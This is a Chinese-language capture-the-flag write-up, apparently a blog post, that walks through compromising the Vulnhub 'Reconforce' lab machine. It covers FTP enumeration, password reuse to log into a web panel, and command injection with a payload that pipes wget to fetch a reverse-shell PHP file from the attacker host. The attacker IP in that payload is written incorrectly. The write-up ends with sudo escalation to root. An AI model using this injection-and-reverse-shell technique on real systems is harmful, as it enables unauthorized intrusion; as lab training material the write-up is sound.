Vulnhub靶机Reconforce渗透

82 阅读2分钟

靶机介绍 官方下载地址:www.vulnhub.com/entry/hackn… 这个靶机有两个flag,难度是中级 在这里插入图片描述 运行环境 靶机:网络设为桥接,IP地址:192.168.1.89 攻击机:同网段下的kali linux,IP地址:192.168.1.37 开始渗透 将靶机运行起来 在这里插入图片描述 获取靶机IP地址 在这里插入图片描述 在这里插入图片描述 扫描端口及其服务 在这里插入图片描述 这里获取了21端口是允许ftp登录的 而且是允许Anonymous登录的 22端口是ssh服务,密钥加密方式是rsa,80端口是apache的web服务 我们这里先尝试使用ftp登录 在这里插入图片描述 这里获取了提示Security@hackNos可能是一个用户名或者密码 查看当前文件夹没有任何东西,而且也没法切换其他目录 开始访问web服务, 在这里插入图片描述 点击TroublesShoot弹出一个登录页面 在这里插入图片描述 尝试弱密码无法登录,最终使用frp提示的Security@hackNos作为admin用户的密码登录成功 在这里插入图片描述 发现是一个命令执行的页面,127.0.0.1可以执行成功 在这里插入图片描述 加上管道符和ls,可以查看当前文件夹下面的内容 在这里插入图片描述 在这里插入图片描述 查看out.php内容,过滤掉了一些特殊字符 在这里插入图片描述 可以执行系统命令就可以使用wget或者curl将反弹shell的php文件或者木马下载到当前的文件夹下 执行 127.0.0.1|wget http://192.168.1.370:8080/shell.php 没有回显任何东西 执行127.0.0.1|ls查看一下 在这里插入图片描述 shell.php下载成功,开启监听,并访问shell.php 在这里插入图片描述 反弹成功,使用python开启一个终端 在这里插入图片描述 查看所有用户 在这里插入图片描述 尝试先提取到recon,查看recon用户的文件,查看Linux版本都没有找到可以利用的信息 最后使用ftp提示的密码,切换到了recon用户 在这里插入图片描述 在recon用户的家目录里面找到了第一个flag 在这里插入图片描述 知道了recon用户的密码,提权就简单很多了,直接使用sudo就可以了 在这里插入图片描述 成功提权到root,切换到root目录,查看最后一个flag 在这里插入图片描述 两个flag都已经找到了,这个靶机也就渗透成功了!